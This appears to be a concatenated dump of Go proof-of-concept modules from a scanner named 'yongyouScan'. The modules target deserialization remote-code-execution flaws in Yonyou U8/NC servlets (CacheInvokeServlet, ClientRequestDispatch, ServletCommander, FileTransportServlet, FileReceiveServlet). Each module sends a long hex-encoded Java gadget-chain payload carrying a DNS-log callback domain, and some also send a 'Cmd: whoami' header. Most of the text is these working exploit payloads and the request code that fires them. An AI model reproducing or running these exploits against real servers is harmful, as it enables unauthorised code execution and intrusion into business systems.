FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url) 26 | if err != nil { 27 | color.Red.Println("[-] 用友 U8 CacheInvokeServlet反序列化漏洞不存在") 28 | return 29 | } 30 | if dnslog.GetDnslogRecord(session) { 31 | color.Green.Println("[+] 用友 U8 CacheInvokeServlet反序列化漏洞存在 -> " + 
url) 32 | return 33 | } 34 | color.Red.Println("[-] 用友 U8 CacheInvokeServlet反序列化漏洞不存在") 35 | } 36 | -------------------------------------------------------------------------------- /pkg/POC/U8-ClientRequestDispatch/U8-ClientRequestDispatch.go: -------------------------------------------------------------------------------- 1 | package U8_ClientRequestDispatch 2 | 3 | import ( 4 | "encoding/hex" 5 | "fmt" 6 | "github.com/gookit/color" 7 | "github.com/imroc/req/v3" 8 | "time" 9 | "yongyouScan/pkg/dnslog" 10 | "yongyouScan/pkg/utils" 11 | ) 12 | 13 | var ( 14 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 15 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 16 | ) 17 | 18 | func Run(url string) { 19 | domain, session := dnslog.GetDnslogUrl() 20 | url = url + "/service/~iufo/nc.ui.iufo.jiuqi.ClientRequestDispatch" 21 | _, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 22 | "User-Agent": UA, 23 | "Content-Length": "16284", 24 | "Content-Type": "application/x-www-form-urlencoded", 25 | }).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", 
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url) 26 | if err != nil { 27 | color.Red.Println("[-] 用友 U8 ClientRequestDispatch反序列化漏洞不存在") 28 | return 29 | } 30 | if dnslog.GetDnslogRecord(session) { 31 | color.Green.Println("[+] 用友 U8 ClientRequestDispatch反序列化漏洞存在 -> " 
+ url) 32 | return 33 | } 34 | color.Red.Println("[-] 用友 U8 ClientRequestDispatch反序列化漏洞不存在") 35 | } 36 | -------------------------------------------------------------------------------- /pkg/POC/u8-ServletCommander/u8-ServletCommander.go: -------------------------------------------------------------------------------- 1 | package u8_ServletCommander 2 | 3 | import ( 4 | "encoding/hex" 5 | "fmt" 6 | "github.com/gookit/color" 7 | "github.com/imroc/req/v3" 8 | "time" 9 | "yongyouScan/pkg/dnslog" 10 | "yongyouScan/pkg/utils" 11 | ) 12 | 13 | var ( 14 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 15 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 16 | ) 17 | 18 | func Run(url string) { 19 | domain, session := dnslog.GetDnslogUrl() 20 | url = url + "/service/~tbb/nc.bs.ntb.plugin.ServletCommander" 21 | _, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 22 | "User-Agent": UA, 23 | "Cmd": "whoami", 24 | "Content-Length": "20327", 25 | "Content-Type": "application/x-www-form-urlencoded", 26 | }).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", 
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url) 27 | if err != nil { 28 | color.Red.Println("[-] 用友 U8 ServletCommander反序列化漏洞不存在") 29 | return 30 | } 31 | if dnslog.GetDnslogRecord(session) { 32 | color.Green.Println("[+] 用友 U8 ServletCommander反序列化漏洞存在 -> " + url) 33 
| return 34 | } 35 | color.Red.Println("[-] 用友 U8 ServletCommander反序列化漏洞不存在") 36 | } 37 | -------------------------------------------------------------------------------- /pkg/POC/U8-FileTransportServlet/U8-FileTransportServlet.go: -------------------------------------------------------------------------------- 1 | package u8_FileTransportServlet 2 | 3 | import ( 4 | "encoding/hex" 5 | "fmt" 6 | "github.com/gookit/color" 7 | "github.com/imroc/req/v3" 8 | "time" 9 | "yongyouScan/pkg/dnslog" 10 | "yongyouScan/pkg/utils" 11 | ) 12 | 13 | var ( 14 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 15 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 16 | ) 17 | 18 | func Run(url string) { 19 | domain, session := dnslog.GetDnslogUrl() 20 | url = url + "/service/~iufo/nc.ui.iufo.server.center.FileTransportServlet" 21 | _, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 22 | "User-Agent": UA, 23 | "Cmd": "whoami", 24 | "Content-Length": "20327", 25 | "Content-Type": "application/x-www-form-urlencoded", 26 | }).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", 
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url) 27 | if err != nil { 28 | color.Red.Println("[-] 用友 U8 FileTransportServlet反序列化漏洞不存在") 29 | return 30 | } 31 | if dnslog.GetDnslogRecord(session) { 32 | color.Green.Println("[+] 用友 U8 FileTransportServlet反序列化漏洞存在 -> " + 
url) 33 | return 34 | } 35 | color.Red.Println("[-] 用友 U8 FileTransportServlet反序列化漏洞不存在") 36 | } 37 | -------------------------------------------------------------------------------- /pkg/POC/FileReceiveServlet-Deser/FileReceiveServlet-Deser.go: -------------------------------------------------------------------------------- 1 | package FileReceiveServlet_Deser 2 | 3 | import ( 4 | "encoding/hex" 5 | "fmt" 6 | "github.com/gookit/color" 7 | "github.com/imroc/req/v3" 8 | "time" 9 | "yongyouScan/pkg/dnslog" 10 | "yongyouScan/pkg/utils" 11 | ) 12 | 13 | // https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8B%20NC%20FileReceiveServlet%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96RCE%E6%BC%8F%E6%B4%9E.md 14 | 15 | var ( 16 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 17 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 18 | ) 19 | 20 | func Run(url string) { 21 | domain, session := dnslog.GetDnslogUrl() 22 | url = url + "/servlet/FileReceiveServlet" 23 | _, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 24 | "User-Agent": UA, 25 | }).SetBody("data=" + 
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
